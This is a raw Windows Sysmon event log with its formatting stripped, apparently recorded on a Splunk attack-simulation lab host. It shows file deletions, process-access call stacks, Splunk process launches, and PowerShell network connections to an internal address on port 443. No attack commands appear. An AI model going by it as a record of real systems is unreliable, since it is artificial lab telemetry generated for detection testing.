Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=92DC1A7E9DABCD37F490CA0EF611C6B1,SHA256=D7A2E923C7DA65AE33605500F271FA9A6710402AD1EC0C2C57BB8CFF472ABB2B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344249Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:13.863{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=044756D260C6EF84C7D5814A8122B8C1,SHA256=CC567BA6533A3CFF35D8572D4740CE4DC781B77BD115D313D1C25F5B2414BD82,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344248Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:13.863{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=704702AFEBB71A9546F0CF7C8AF20BFA,SHA256=E9804D2A933485E981704199451139ACA204C86DDE5A80CC829C5F71F17FFE12,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344247Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:13.101{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AD46180F71B43524E0EC391AF3CEF24B,SHA256=53DAF63FD6076EB66F66E440632780CB1AF322D75D3AE11C59B5AAFFE4663F83,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344253Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:40.112{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52658-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035344252Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:39.836{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52657-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035344251Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:14.114{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=323A94518B78E1D4DE46DE1A4F3419BB,SHA256=CE3572D1B58880F47EC6E09433C4E3B50AD0428DBB49334AD4B89F9BF4D9CD1F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344254Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:15.130{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1E0058D22F16681160546BA03C35AB9,SHA256=9C97443DCE76A0A08C2C4F252CCBCDCE5A4A825D538F2867B15E8B7D7FDE0D03,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035344256Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:42.253{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52659-false10.0.1.12-8000- 23542300x800000000000000035344255Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:16.176{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBF7FBBEE3D0A5F869E309C1B31FF5D9,SHA256=034B0F47BA126DC6B8AB2444EB10FDA4B73FAFEC3C8063343A3A1E0E4EE314AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344273Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:17.991{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-751D-613B-7DB4-03000000C801}356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344272Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:17.991{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344271Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:17.991{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344270Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:17.991{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344269Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:17.991{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344268Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:17.991{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-751D-613B-7DB4-03000000C801}356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344267Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:17.991{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-751D-613B-7DB4-03000000C801}356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035344266Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:17.976{B81B27B7-751D-613B-7DB4-03000000C801}356C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000035344265Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:17.327{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-751D-613B-7CB4-03000000C801}5520C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344264Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:17.312{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344263Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:17.312{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344262Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:17.312{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344261Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:17.312{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344260Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:17.312{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-751D-613B-7CB4-03000000C801}5520C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035344259Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:17.312{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-751D-613B-7CB4-03000000C801}5520C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035344258Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:17.306{B81B27B7-751D-613B-7CB4-03000000C801}5520C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035344257Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:17.210{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97BDB42636C1C18627EFC82687B3DF83,SHA256=1C0E4B2FB8FF31EF1F878E1E27418700BD39AFAF3B083E78A91692631966CF62,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344284Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:18.490{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D14643A76E80CA1A4D18261590E0CCC,SHA256=59073D7767EC408C93F3A2929CB2DA50991D2278AC171A1B12BF442A154D5E5F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344283Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:18.311{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=044756D260C6EF84C7D5814A8122B8C1,SHA256=CC567BA6533A3CFF35D8572D4740CE4DC781B77BD115D313D1C25F5B2414BD82,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035344282Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:18.176{B81B27B7-751D-613B-7DB4-03000000C801}3565272C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344281Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:18.145{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-751E-613B-7EB4-03000000C801}5436C:\Windows\system32\ARP.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344280Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:18.145{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344279Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:18.145{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344278Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:18.145{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344277Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 